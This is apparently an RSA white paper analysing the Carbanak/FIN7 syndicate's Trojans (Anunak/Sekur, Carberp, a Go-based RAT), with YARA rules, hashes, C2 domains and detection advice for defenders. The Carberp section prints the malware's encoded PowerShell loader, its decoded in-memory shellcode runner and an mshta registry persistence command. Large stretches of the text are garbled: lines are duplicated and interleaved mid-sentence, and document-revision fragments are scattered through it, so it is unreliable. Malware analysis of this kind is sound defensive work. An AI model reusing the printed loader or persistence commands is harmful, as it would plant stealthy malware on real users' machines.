1. a group of individuals or organizations combined to promote some
common interest.
The criminal gangs of the Carbanak/FIN7 syndicate have been attributed to
numerous intrusions in the banking, hospitality, retail and other industrial
verticals, collecting financial information of all kinds. The name Carbanak
comes from
Carberp,
a banking Trojan whose source code was leaked, and
Anunak, a custom Trojan that has evolved over the years. Since at least 2015,
the group appears to have fragmented into smaller, loosely related groups,
each with its own preferred toolsets and Trojans, although many similarities
in tactics, techniques and procedures (TTPs) exist.
Using APT-style tactics and techniques, the perpetrators compromise an
organization, quickly escalate privileges and begin searching for any system
that could access the financial data of interest. This ranges from scanning the
network via WMI to look for running process names containing clear text
credit card information, to monitoring a user
s screen to learn how to operate
the systems used to process financial information. Once they find these data
and a method to access this financial information, they begin bulk harvesting.
If it is credit card track data, it can be turned around and sold on carder forums
in bulk. ATM and SWIFT data require more and less legwork, respectively.
Based on these tactics, the Carbanak/FIN7 syndicate is oftentimes
considered an APT. Given our research, RSA disagrees with this classification.
While the group is an extremely persistent threat, they are not advanced and
t demonstrate having access to zero-day exploits or innovative tools.
This gives network defenders the edge in protecting their financial data. With
proper visibility and control sets in place, an analyst can easily identify these
techniques and remediate quickly, thus shortening attacker dwell time and
helping to prevent exfiltration of sensitive data.
During the course of investigation, RSA Research observed Carbanak actors
employing a handful of unique Trojans, along with freely available malware,
to persist and move laterally once a network foothold was established. While
many of these methods are novel, they are also well-known in the penetration
testing industry. This is most likely by design, as many of these remote
administration tools are frequently used by network administrators for
legitimate purposes and would not have antivirus coverage or seem out of the
ordinary. Employing the least sophisticated methods available, the Carbanak
actors safeguard more advanced tools from being identified, and potentially
invalidated, through static or behavioral detection techniques.
WHITE PAPER
This paper reviews the characteristics of Carbanak
s known Trojans and
TTPs to provide network defenders a better understanding of the group
capabilities and history. Armed with this knowledge, defenders should be able
to better assess risk and allocate resources to the appropriate blind spots that
plague most modern networked organizations.
2. THE DIGITAL ARSENAL
2.1. OVERVIEW
During the course of this effort, RSA observed many different Remote Access
Trojans (RATs) associated with this group. Several are based on crimeware/
2.!The
Digitalthat
Arsenal
banker Trojans
are in use by different criminal actors, but are uniquely
customized
Carbanak/FIN7.
The following sections outline the capabilities
2.1.! Overview
of each RAT and discuss possible detection methods.
During the course of this effort, RSA observed many different Remote Access Trojans (RATs) associated
with
thisAnunak/Sekur
group. Several are based on crimeware/banker Trojans that are in use by different criminal
2.1.1.
actors, but are uniquely customized for Carbanak/FIN7. The following sections outline the capabilities of
TheRAT
Anunak,
or Sekur,
been
and may still be
the mainstay
each
and discuss
possibleTrojan
detectionhas
methods.
of the Carbanak/FIN7 syndicate. A custom configurable Trojan, it has
undergone minor changes over the past several years, most notably to its
communications
2.1.1.! protocols.
Anunak/Sekur
TheAnunak,
Anunak/Sekur
Trojan
is a self-contained
dropper/Trojan
combination.
or Sekur, Trojan
has been
may still be
mainstay of the Carbanak/FIN7
syndicate.
custom
configurable
Trojan,
undergone
minor
changes
over
past
several
years,
most
notably
If executed outside of its configured path, it will entrench itself and remove
to its communications protocols.
the original file. The Trojan is typically packed or
crypted
(a packer modified
Anunak/Sekur
is a self-contained
dropper/Trojan
combination.
If executed outside ofmaking
over
time usingTrojan
encryption,
encoding
or compression
methodologies),
configured path, it will entrench itself and remove the original file. The Trojan is typically packed or
static analysis difficult and rendering signatures useless. The Trojan begins
crypted
(a packer modified over time using encryption, encoding or compression methodologies),
by resolving
Win32
APIand
addresses
and uses
RtlDecompressBuffer
to expand
making
static analysis
difficult
rendering signatures
useless.
The Trojan begins by resolving
Win32
and usespayload
RtlDecompressBuffer
expandstarts
the compressed
payload Host
DLL. The
Trojan starts
theaddresses
compressed
DLL. The toTrojan
the Service
executable,
the Service Host executable, svchost.exe, in a suspended state (Figure 1).
svchost.exe, in a suspended state (Figure 1).
Deleted:
Deleted: Cr
Deleted: Ba
Deleted: Fi
Deleted:
Deleted:
Deleted:
Deleted: Fi
Deleted: Sy
Deleted:
Comment [
another"sou
Comment [
Deleted:
Deleted:
Deleted: ,
Deleted: .
Deleted:
Deleted:
Figure Figure
1: Create
svchost.exe
Suspended
1: Create
svchost.exe Suspended
The malware then allocates executable memory inside the svchost.exe
address space, unpacks and injects the expanded DLL, and creates the main
thread for the Anunak/Sekur malware. The Trojan is then copied into two
startup directories with a name based off the MAC address and machine
name (Figures 2 and 3).
WHITE PAPER
The malware then allocates executable memory inside the svchost.exe address space, unpacks and injects
The malware then allocates executable memory inside the svchost.exe address space, unpacks and injects
the expanded
DLL, and creates the main thread for the Anunak/Sekur malware. The Trojan is then copied
the expanded DLL, and creates the main thread for the Anunak/Sekur malware. The Trojan is then copied
into two
directories
with
the MAC
MACaddress
address
machine
name
(Figures
and 3).
into startup
two startup
directories
witha aname
namebased
based off
off the
machine
name
(Figures
2 and23).
Deleted:Del
Deleted:
Figure2:
2: Autoruns
Autoruns
Figure
Figure
Figure
2: Autoruns
Autoruns
Figure 3: Entrenchment and Injection
3: Entrenchment and Injection
FigureFigure
3: Entrenchment
and Injection
The Trojan then enumerates the running processes, looking for specific antivirus vendors and killing their
Deleted: An
Deleted:
3:running
Entrenchment
and Injection
The Trojan
then
enumerates
looking
fora specific
worker
processes
to increase
chancesFigure
ofthe
persistence.
Theprocesses,
Trojan
also drops
and reads
configuration file
Deleted:
Deleted:
with
initial instructions
into
thekilling
C:\ProgramData\Mozilla\
directory with
filename based
off the of
antivirus
vendors
their worker processes
to aincrease
chances
The Trojan
enumerates
running
address then
and machine
namethe
(Figure
4). processes, looking for specific antivirus vendors and killing their
persistence.
The Trojan
also
and The
reads
a configuration
initial file
worker
processes to increase
chances
of drops
persistence.
Trojan
also drops and file
readswith
a configuration
with initial
instructions
into
C:\ProgramData\Mozilla\
C:\ProgramData\Mozilla\
directory
with a filename
based off the MAC
instructions
into
directory
with a filename
address
and machine
4). Anunak/Sekur
based
off the name
MAC(Figure
address
machine
(Figure
Figure 4:and
Initial name
Configuration
Example4).
Figure 4: Anunak/Sekur Initial Configuration Example
FireEye"goes in-depth into the observed variants, commands the Trojan receives and configurations
discovered in the wild. RSA NetWitness
Endpoint can detect this injected DLL (Figure 5) and triggers
Figure
Anunak/Sekur
Initial
Configuration
Example
Figure
4: Anunak/Sekur
Initial6)Configuration
Example
many instant indicators
of compromise
(IIOCs) (Figure
that ship with
the product,
by default.
Deleted: in
Deleted:
FireEye"goes
into the observed
variants,
commands
the Trojan
receivesthe
and Trojan
configurations
FireEyein-depth
goes in-depth
into the
observed
variants,
commands
discovered in the wild. RSA NetWitness
Endpoint can detect this injected DLL (Figure
5) and triggers
receives and configurations discovered in the wild. RSA NetWitness
Endpoint
many instant indicators of compromise (IIOCs) (Figure 6) that ship with the product, by default.
Deleted: In
Deleted:
can detect this injected DLL (Figure 5) and triggers many instant indicators of
compromise (IIOCs) (Figure 6) that ship with the product, by default.
Figure 5: Injected DLLs Detected by RSA NetWitness Endpoint
Figure 5: Injected DLLs Detected by RSA NetWitness Endpoint
Deleted:
Deleted:
Deleted: In
Deleted:
Deleted: Co
Deleted:
Deleted: '
WHITE PAPER
Figure 5: Injected DLLs Detected by RSA NetWitness Endpoint
Figure
6: IIOCs
Triggered
Endpoint
Figure
6: IIOCs
TriggeredininRSA
RSANetWitness
NetWitness Endpoint
The Anunak/Sekur
Trojan may be
configured
communicate
with the Command
and Control [C2]
The Anunak/Sekur
Trojan
may betoconfigured
to communicate
with the
server in twoCommand
ways: via and
HTTP
or a custom
protocol
to aways:
hardcoded
IP address.
Oftenprotocol
the Trojan is
Control
[C2] server
in two
via HTTP
or a custom
configured with
methods.
The HTTP
request
easilyisdetected
withwith
NetWitness
to aboth
hardcoded
IP address.
Often
the is
Trojan
configured
both
methods.Logs and
Packets usingThe
theHTTP
RSA NetWitness
Hunting
Pack and
the recommendations
in the HTTP
request is easily
detected
withfollowing
RSA NetWitness
Logs and Packets
section. The using
HTTPthe
method
uses the GETHunting
(FigurePack
7) and
POST
(Figure
methods to create a covert, biRSA NetWitness
following
the8)recommendations
directional communication
channel
with
the C2.
It generally
very
few HTTP
in the HTTP section.
HTTP
method
uses thehas
(Figure
7) andheaders
POST and oftentimes
uses the default
User-Agent
configured
in athe
Windows
Registry. communication channel
(Figure
8) methods
to create
covert,
bi-directional
with the C2. It generally has very few HTTP headers and oftentimes uses the
default User-Agent configured in the Windows Registry.
FigureFigure
7: Anunak/Sekur
HTTP GET Request
7: Anunak/Sekur HTTP GET Request
WHITE PAPER
Figure 7: Anunak/Sekur HTTP GET Request
Figure
8:8:
Anunak/Sekur
HTTPPOST
POSTRequest
Request
Figure
Anunak/Sekur HTTP
type
HTTP C2 communication
is common
to many
malware
This type ofThis
HTTP
C2ofcommunication
is common to
many malware
families
and families
is a good reason to
anddetection
is a goodand
reason
to follow
up any detection
treat
it as
routine.
follow up any
not treat
it as
routine.
Pivotingand
intonot
NetWitness
Endpoint and finding
Pivoting
into
NetWitness
Endpoint
finding
module
creating
the (Figure 9).
the module creating the connections leads us to the injected DLLs and tracking data behavior
connections leads us to the injected DLLs and tracking data behavior (Figure 9).
Figure 9: Anunak/Sekur Network Tracking Data
Figure 9:
Anunak/Sekur Network Tracking Data
Since RSA NetWitness Endpoint downloads the injected DLL, you can right-click the DLL, select
analyze RSA
and view
the strings. The
configuration
path
C:\ProgramData\Mozilla\.bin
Since
NetWitness
Endpoint
downloads
the injected DLL, you canshould
rightvisible the
in theDLL,
sselect
strings,analyze
and discovery
this activity
can be automated
with a YARA signature.
click
andofview
the strings.
The configuration
path
ProgramData\Mozilla\.bin
should be visible in the DLL
s strings, and
YARA Signature for Anunak/Sekur Injected DLL
rule Carbanak_Anunak
discovery
this
activity
automated
with a YARA signature.
Deleted: ri
Deleted:
meta:
author =
RSA FW
strings:
$mz =Signature
{ 4D 5A }
YARA
for Anunak/Sekur Injected DLL
$regex = /\:\\ProgramData\\Mozilla\\.{12,20}\.bin/
condition:
rule
Carbanak_Anunak
$mz at 0 and $regex
meta:
author =
RSA FW
The second method of C2, a custom TCP-based protocol, is more difficult to find. The protocol has
strings:
evolved
over the years
most recent observations showing it
s now fully encrypted
making the data
= {However,
4D 5A }there is a distinct handshake in the latest encrypted version. After the TCP
appear
random.
$regexthe=Trojan
/\:\\ProgramData\\Mozilla\\.{12,20}\.bin/
handshake,
sends packet with a 64-byte payload, which the server acknowledges. The Trojan
then sends a packet with a 224-byte payload, which the server also acknowledges (Figure 10). This is
condition:
followed by the server sending a packet with a 32-byte payload (Figure 11).
$mz at 0 and $regex
Deleted:
Deleted:
Deleted:
Deleted:
Deleted:
Deleted:
YARA Signature for Anunak/Sekur Injected DLL
rule Carbanak_Anunak
meta:
author =
RSA FW
strings:
$mz = { 4D 5A }
$regex = /\:\\ProgramData\\Mozilla\\.{12,20}\.bin/
condition:
$mz at 0 and $regex
WHITE PAPER
The second method of C2, a custom TCP-based protocol, is more difficult
to find. The protocol has evolved over the years
most recent observations
The secondshowing
method of
a custom
TCP-based protocol,the
is more
difficultrandom.
to find. The
protocol has
sC2,
fully encrypted
making
data appear
However,
evolved over
the years
most
recent observations
showing
s nowversion.
fully encrypted
making
there
is a distinct handshake
in the latest
encrypted
After the TCP the data
appear random.
However,
there
distinct
handshake
latest
encrypted
version.
After the TCP
handshake, the Trojan sends packet with a 64-byte payload, which
the server
handshake,acknowledges.
the Trojan sendsThe
packet
withthen
a 64-byte
server acknowledges.
The Trojan
Trojan
sendspayload,
a packetwhich
with athe
224-byte
payload,
then sends which
a packet
with
224-byte
payload,
which
server
also
acknowledges
(Figure
10).
the server also acknowledges (Figure 10). This is followed by the serverThis is
followed bysending
the server
sending
a packet
with apayload
32-byte(Figure
payload11).
(Figure 11).
a packet
with
a 32-byte
Figure
Handshake Request
Request Sequence
Figure
10:10:
Handshake
Sequence
Figure
11:11:Handshake
ResponseRequest
Request
Figure
Handshake Response
When the RSA NetWitness packet decoder sees this sequence, the metadata
sekur handshake
is registered in the Indicators of Compromise field
When the RSA NetWitness packet decoder sees this sequence, the metadata
sekur handshake
(Figure 12). While we have high confidence in these results, please be aware
registered in the Indicators of Compromise field (Figure 12). While we have high confidence in these
that under rare circumstances this parser may false alarm on sessions
results, please be aware that under rare circumstances this parser may false alarm on sessions that have
that have the same handshake pattern and aren
t actually the Trojan
s C2
the same handshake pattern and aren
t actually the Trojan
s C2 communications. Any Sekur handshake
communications. Any Sekur handshake hits should be investigated on the
hits should be investigated on the host using the above information on the behavior of this Trojan.
host using the above information on the behavior of this Trojan.
Figure 12: Anunak/Sekur Handshake Metadata
WHITE PAPER
When the RSA NetWitness packet decoder sees this sequence, the metadata
sekur handshake
registered in the Indicators of Compromise field (Figure 12). While we have high confidence in thes
results, please be aware that under rare circumstances this parser may false alarm on sessions that ha
the same handshake pattern and aren
t actually the Trojan
s C2 communications. Any Sekur handsha
hits should be investigated on the host using the above information on the behavior of this Trojan.
Figure 12: Anunak/Sekur Handshake Metadata
Figure 12: Anunak/Sekur Handshake Metadata
2.1.2. Carberp
The Carberp banking Trojan is responsible for the first half of the name
Carbanak. This Trojan has been around at least since 2010 with the source
code leaked in 2013.
2.1.2.!
Carberp
Carberp was likely chosen by the actors for both its plug-in capability and
The Carberp banking
is responsible
forsome
the first
half of obscurity
the namefor
Carbanak.
codeTrojan
availability.
This provides
operational
Carbanak/This Trojan has b
FIN7,
numerous
variants
this
code
were
used
(and
remain
in use)
around at least since 2010 with the source code leaked in 2013.
by other Crimeware actors. RSA Incident Response Services has dealt
theseby
specific
Carbanak/FIN7
actors
multiple
times, with
Carberp was likelywith
chosen
the actors
for both its
plug-in
capability
and this
codevariant
availability. This pro
analyzed by
Research.
some operational obscurity
forRSA
Carbanak/FIN7,
as numerous variants of this code were used (and rem
in use) by other Crimeware
actors.
Incident32-bit
Response
Services
has look
dealtatwith these specific
The droppers
comeRSA
in two versions,
and 64-bit.
We will
Carbanak/FIN7 actors
multiple
times, with this variant analyzed by RSA Research.
the 32-bit
version.
The droppers comeMetadata
in two versions, 32-bit and 64-bit. We will look at the 32-bit version.
File Name: ml.exe
Metadata
File Size: 96256 bytes
File Name: ml.exe
MD5:
608b8bc44a59e2d5c6bf0c5ee5e1f517
File Size: 96256 bytes
SHA1:
37de1791dca31f1ef85a4246d51702b0352def6d
MD5:
608b8bc44a59e2d5c6bf0c5ee5e1f517
PE Time: 0x658ACD2B [Tue Dec 26 12:55:07 2023 UTC]
SHA1:
37de1791dca31f1ef85a4246d51702b0352def6d
Sections (4):
PE Time: 0x658ACD2B
[Tue Dec
Name Entropy
MD526 12:55:07 2023 UTC]
Sections (4):
.text 6.9
6b51c476e9cae2a88777ee330b639166
Name Entropy MD5
.rdata 4.85
ad94fa5c9ff3adcdc03a1ad32cee0e3a
.data 1.2
.rsrc 4.13
2e2bc95337c3b8eb05467e0049124027
7396ce1f93c8f7dd526eeafaf87f9c2e
Figure 13: Carberp Dropper Metadata
The first noticeable item is that the compile time seems to be in the future.
In RSA NetWitness Endpoint, the compile time can be added in the Global
Modules List and sorted on. The two extremes are generally where the
interesting modules can be found, either a very long time ago or sometime in
the future.
When executed, the dropper checks to see if PowerShell is on the system and
then creates registry keys in
HKEY_CURRENT_USER\Software\Licenses.
HKEY_CURRENT_USER
specifies the logged-on user profile, meaning this
malware will only launch when the user who ran the dropper logs on. This
technique is oftentimes labelled as
file-less malware,
but the user
s Registry
Hive, NTUSER.dat, is a hidden file residing in the user
s root directory.
WHITE PAPER
On Windows Vista and newer Microsoft operating systems, this is in C:\
Users\\; older Windows versions reside in C:\Documents and
Settings\\.
This represents a problem for the incident responder, as the malware is not
present in memory, only in the registry, unless the specific user is logged
on. This is an interesting way to avoid detection by endpoint detection and
response (EDR) tools. Using a bit of creativity and PowerShell, responders can
build a script that queries for user profiles and retrieves the actual Registry
Hive or queries for the registry key itself.
The first registry key created is {01838681CA59881EA} and contains the
binary shellcode used to unpack the encoded payload DLL. The second key
is {01838611EAC11772E} and contains a base 64 encoded PowerShell
command (Figure 14).
PowerShell Command Encoded
w=new ActiveXObject(
WScript.Shell
);w.Run(
powershell.exe -noexit -enc
JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQB
uAGMAZQA9ACcAUwB0AG8AcAAnAAoAJABzAD0AKABHAGUAdAAt
AEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACA
ASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATABpAGMA
ZQBuAHMAZQBzACkALgAnAHsAMAAxADgAMwA4ADYAOAAxAEMA
QQA1ADkAOAA4ADEARQBBAH0AJwAKACQAbAA9ACQAcwAuAEwA
ZQBuAGcAdABoAAoAJABjAD0AQAAiAAoAWwBEAGwAbABJAG0AcA
BvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF
0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQ
AZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaA
ByAGUAYQBkACgASQBuAHQAUAB0AHIAIABhACwAdQBpAG4AdAAg
AGIALABJAG4AdABQAHQAcgAgAGMALABJAG4AdABQAHQAcgAgAG
QALAB1AGkAbgB0ACAAZQAsAEkAbgB0AFAAdAByACAAZgApADsAC
gBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzA
DIALgBkAGwAbAAiACkAXQAKAHAAdQBiAGwAaQBjACAAcwB0AGE
AdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgB
pAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAg
AGEALAB1AGkAbgB0ACAAYgAsAHUAaQBuAHQAIABjACwAdQBpAG
4AdAAgAGQAKQA7AAoAIgBAAAoAJABhAD0AQQBkAGQALQBUAHk
AcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbw
BuACAAJABjACAALQBOAGEAbQBlACAAJwBXAGkAbgAzADIAJwAgA
C0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4A
YwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQAKACQAY
gA9ACQAYQA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKA
AwACwAJABsACwAMAB4ADMAMAAwADAALAAwAHgANAAwACkA
CgBbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB
0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAG
WHITE PAPER
EAbABdADoAOgBDAG8AcAB5ACgAJABzACwAMAAsACQAYgAsACQA
bAApAAoAJABhADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZA
AoADAALAAwACwAJABiACwAMAAsADAALAAwACkAfABPAHUAdA
AtAE4AdQBsAGwA
,0,0);
Figure 14: Encoded PowerShell Command
PowerShell Command Decoded
$ErrorActionPreference=
Stop
$s=(Get-ItemProperty -Path HKCU:\Software\
Licenses).
{01838681CA59881EA}
$l=$s.Length
$c=@
[DllImport(
kernel32.dll
public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr
d,uint e,IntPtr f);
[DllImport(
kernel32.dll
public static extern IntPtr VirtualAlloc(IntPtr a,uint b,uint c,uint d);
$a=Add-Type -memberDefinition $c -Name
Win32
-namespace
Win32Functions -passthru
$b=$a::VirtualAlloc(0,$l,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($s,0,$b,$l)
$a::CreateThread(0,0,$b,0,0,0)|Out-Null
Figure 15: Decoded PowerShell Command
This PowerShell script imports VirtualAlloc and CreateThread from Kernel32,
copies the shellcode to a segment of memory with PAGE_EXECUTE_
READWRITE [ 0x40] and creates a thread at the returned base of the allocated
memory indicated by variable $b (Figure 15). The malware then creates
another registry entry at
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run\mshta
with the values shown in Figure 16.
PowerShell Command Decoded
cmd.exe /c mshta
about:
title>
Figure 16: MSHTA Persistence
The dropper DLL then runs that same command to start the malware
and exits, without deleting itself. When the user logs onto their machine,
the MS HTML Application (MSHTA) creates a new ActiveX object that
executes the encoded PowerShell script. This PowerShell script allocates
WHITE PAPER
HTML
HTML Application
Application Registry
Registry Key
cmd.exe /c
cmd.exe
/c mshta
mshta "about: "
window.flag)close()"
Figure
Figure 16:
16: MSHTA
MSHTA Persistence
Persistence
The dropper
dropper DLL
DLL then
then runs
runs that
that same
same command
command to
to start
start the
the malware
malware and
and exits,
exits, without
without deleting
deleting itself.
itself.
executable
copies
contents(MSHTA)
of the first
When
logs
machine,
HTML
creates
aa new
When the
the user
user memory
logs onto
onto their
their
machine,
thethe
MS binary
HTML Application
Application
(MSHTA)
createsregistry
new ActiveX
ActiveX
object
that
executes
encoded
PowerShell
script.
This
PowerShell
script
allocates
executable
memory
into
space,the
then
creates
a thread
base address
of this
memory.
objectthat
that executes
encoded
PowerShell
script.at
This
PowerShell
script allocates
executable
memory
contents
first
into
that
then
creates
and copies
copies
the binary
binary
contents of
first registry
registry
intoruns
that space,
space,
thenCarberp
creates aa thread
thread
athas
the base
base
This
shellcode
unpacks
Carberp
address
address of
of this
this memory.
memory. This
This shellcode
shellcode unpacks
unpacks aa Carberp
Carberp DLL
DLL and
and runs
runs it.
it. The
The Carberp
Carberp DLL
DLL has
has antiantianti-analysis
features
that
check for
virtualization
common
sandboxing
analysis
analysis features
features that
that check
check for
for virtualization
virtualization and
and common
common sandboxing
sandboxing techniques,
techniques, exiting
exiting if
if it
it finds
finds any.
any.
Endpoint
Trojan
aa floating
techniques,
it findsthis
any.
RSAas
Endpoint
discoversinstance
this
RSA NetWitness
NetWitnessexiting
Endpointifdiscovers
discovers
this
Trojan
asNetWitness
floating DLL
DLL in
the user
user
s explorer.exe
explorer.exe
instance
(Figure
(Figure 17).
17).
Trojan
as a floating DLL in the user
s explorer.exe instance (Figure 17).
Deleted:
Deleted:
Deleted:
Deleted:
Deleted:
Deleted:
Deleted:
Deleted:
Deleted:
Deleted: uu
Carberp
Figure
Carberp Floating
Floating
DLL DLL
FigureFigure
17:17:
Carberp
Floating
Figure 18:
Carberp
Startup
from
Figure
Figure 18:
18: Carberp
Carberp Startup
Startup from
from NEW
When inspecting this suspicious DLL in RSA NetWitness Endpoint, right-clicking
When
inspecting
this
suspicious
Endpoint,
module
Analyze
shows suspicious
network-related
strings
When
inspecting
thisselecting
suspicious DLL
in RSA
RSA NetWitness
NetWitness
Endpoint, right-clicking
right-clicking
the module
module
selecting
Analyze
shows
suspicious
network-related
strings
(Figure
19).
malware
communicates
selecting
Analyze
suspicious
network-relatedvia
strings
(Figureto
19).
Thedomains
malware communicates
(Figure
19). The shows
malware
communicates
SSL/TLS
below and
via SSL/TLS
SSL/TLS to
to the
the domains
domains below
below and
and was
was active
active in
in 2015.
2015. The
The Trojan
Trojan may
may also
also be
be configured
configured to
active in 2015.
The Trojan
may also
be configured
to communicate
via HTTP
communicate
communicate via
via HTTP
HTTP and
and be
be detected
detected using
using the
the HTTP
HTTP section
section of
of the
the RSA
RSA NetWitness
NetWitness Hunting
Hunting Pack.
Pack. If
environment
using
SSL/TLS
man-in-the-middle
(MITM)
device,
even
encrypted
detected
using
HTTP
section
NetWitness
Hunting
Pack.
the environment is using an SSL/TLS man-in-the-middle (MITM) device, even the encrypted
communications
can easily
easily
be discovered.
discovered.
Ifcommunications
the environment
is using
an SSL/TLS man-in-the-middle (MITM) device, even
the encrypted communications can easily be discovered.
19: Suspicious Strings in Floating DLL
FigureFigure
19: Suspicious
Strings in Floating DLL
Domain
strangeerglassingpbx.org
klyferyinsoxbabesy.biz
oplesandroxgeoflax.org
IP and Port
192.52.167.137:443
217.12.203.194:443
never registered
Deleted:
Deleted: ri
Deleted:
Deleted:
Deleted:
Deleted:
Deleted:
Deleted:
Deleted:
Deleted: M
Deleted:
Deleted: M
Deleted:
Deleted: M
WHITE PAPER
Domain
IP and Port
strangeerglassingpbx.org
192.52.167.137:443
KLYFERYINSOXBABESY.BIZ
217.12.203.194:443
OPLESANDROXGEOFLAX.ORG
NEVER REGISTERED
The following YARA signature detects the unpacked DLL in an RSA
NetWitness Endpoint environment.
YARA Signature for Injected Carberp DLL
rule Carbanak_Carberp
meta:
author =
RSA FW
strings:
$mz = { 4D 5A }
$path =
%%userprofile%%\\AppData\\LocalLow\\%u.db
wide
$sbox1 =
MALTEST
wide
$sbox2 =
TEQUILABOOMBOOM
wide
$sbox3 =
SANDBOX
wide
$sbox4 =
VIRUS
wide
$sbox5 =
MALWARE
wide
$uri =
/%s?user=%08x%08x%08x%08x&id=%u&ver=%u&os=%lu&os2
=%lu&host=%u&k=%lu&type=%u
wide
condition:
$mz at 0 and $path and $uri and all of ($sbox*)
2.1.3. Other Windows Trojans
The Carbanak/FIN7 syndicate appears to have ready access to an array of
common crimeware and banker-style Trojans, as well as a few custom, yet
relatively simple, Trojans. This indicates that they either a) are part of the
development team that built these Trojans or b) have access to the vendors
that sell these intrusion sets. The simplicity of their custom malware indicates
option b might be likely; however, there is no direct evidence to support this
conclusion. Compounding this issue, the attackers appear to have a solid
grasp on OPSEC, having evaded direct attribution thus far.
The common malware repurposed for targeted intrusions is listed below
with a brief description of each. This is worth mentioning so that a network
defender can alert on AV logs for these specific classifications. By using
malware that would be classified as a
common
threat, they are able to avoid
intense scrutiny.
WHITE PAPER
Trojan Family
Description
Andromeda/Gamarue
Backdoor commonly used to deliver banking
Trojans; uses plug-ins like Carberp to extend
functionality
Qadars
Banking Trojan loosely based on leaked source
code of Carberp and Zeus; supports plug-ins
Meterpreter
Metasploit backdoor payload loader; very
extensible
Cobalt Strike
Full-featured Red Team software; unlicensed
versions using the HTTP beacon contain the
X-malware HTTP header
Odaniff
Download and execute arbitrary files; run shell
commands
In addition to common crimeware repurposed for targeted intrusions, these
actors also engineer their own custom, albeit simplistic, Trojans. The following
example,
ctlmon.exe,
is indicative of their latest work.
Carbanak/FIN7 Go Trojan
File Name: ctlmon.exe
File Size: 4392448 bytes
MD5:
370d420948672e04ba8eac10bfe6fc9c
SHA1: 450605b6761ff8dd025978f44724b11e0c5eadcc
PE Time: 0x0
[Thu Jan 01 00:00:00 1970 UTC]
Sections (4):
Name Entropy MD5
.text 5.86 81e6ebbfa5b3cca1c38be969510fae07
.data 5.17 17c39e9611777b3bcf6d289ce02f42a1
.idata 3.49 b6cb3301099e4b93902c3b59dcabb030
.symtab 0.02 07b5472d347d42780469fb2654b7fc54
This peculiar sample was simple in its implementation, but not simple to
analyze. Written in Go language and compiled into a Windows Executable,
it presented several hurdles to the tools a typical malware analyst will use,
specifically IDA Pro. When importing this sample, nearly none of the functions
were recognized by IDA
s flow-disassembler (Figure 20).
WHITE PAPER
Figure
20:20:
Figure
20:IDA
Pro Flow-Disassembler
Flow-Disassembler
Figure
Flow-Disassembler
By manually defining the code locations, along with a script from strazzere, RSA Research parsed the Go
By manually
defining
the codealong
locations,
alongfrom
withstrazzere,
a script from
strazzere,
By manually
defining the
code locations,
with a script
RSA Research
parsed the Go
Runtime code as well as the imported libraries. This still left more than 5000 functions to analyze (Figure
Deleted:
Runtime 21).
code Research
as well as the
imported
libraries.
Thiscode
still left
more as
than
functions
to analyze (Figure
parsed
the Go
Runtime
as well
the5000
imported
libraries.
21).
This still left more than 5000 functions to analyze (Figure 21).
Figure 21: New IDA Functions to Analyze
Next, scanning through the functions to identify imported libraries
not likely malicious or user created
Deleted:
Figure
NewIDA
IDAFunctions
Functions toto
Analyze
Figure
21:21:
Analyze
allowed us to analyze the user-created logic. Now we simply reference the functionality of the library
Deleted:
code (Figure
22). the functions to identify imported libraries
not likely malicious or user created
Next, scanning
through
Next, scanning through the functions to identify imported libraries
not likely
allowed us to analyze the user-created logic. Now we simply reference the functionality of the library
malicious or user created
allowed us to analyze the user-created logic. Now
code (Figure 22).
we simply reference the functionality of the library code (Figure 22).
Figure 22: User-Created
Code Instead
of Compiled
Libraries
Figure 22: User-Created
Code
Instead
of Compiled
Libraries
Running a web search on the library calls leads to
runtime_stringtoslicebyte,
which takes a string and
turns it into a sequence of bytes
exactly as expected of a simple XOR key. The malware moves the
offset for the XOR key into RAX, then into a QWORD (global variable calculated based on the length of
the XOR key string into RCX), and then onto the stack before it calls
runtime_stringtoslicebyte
decode the configuration (Figure 23).
Deleted: User
Deleted: Googling
Deleted: ,
Deleted:
Deleted:
WHITE PAPER
Running a web search on the library calls leads to
runtime_stringtoslicebyte,
which takes a string and turns it into a sequence of bytes
exactly as expected
of a simple XOR key. The malware moves the offset for the XOR key into RAX,
then into a QWORD (global variable calculated based on the length of the
XOR key string into RCX), and then onto the stack before it calls
runtime_
stringtoslicebyte
to decode the configuration (Figure 23).
Figure 23: Configuration XOR Key
Figure 23: Configuration XOR Key
Figure 23: Configuration XOR Key
When the malware starts, it will decode the command strings used in memory to avoid static detection
and heuristics (Figure 24).
When
the malware starts, it will decode the command strings used in memory
When the malware starts, it will decode the command strings used in memory to avoid static detection
static
detection
and heuristics (Figure 24).
andavoid
heuristics
(Figure
24).
24: Decoded Trojan
Commands
Figure Figure
24: Decoded
Trojan
Commands
Figure 24: Decoded Trojan Commands
A brief synopsis of the commands:
A brief synopsis of the commands:
Command
FunctionFunction
ACommand
brief synopsis of the commands:
Display process listing
#shell
Begin
interactive
shell
Displaycommand
process
listing
Command
Function
#kill
Remove process
Windows
Service and malware
Display
listing
#info
system
information
#shell
Begin
interactive
#shell
Begin
interactive
command shellcommand shell
#wget
Download
functionService
via wget
HTTP
#kill
Remove
Windows
malware
#kill
Remove
#wput
Upload
function
via Windows
wput FTP Service and malware
#info
system
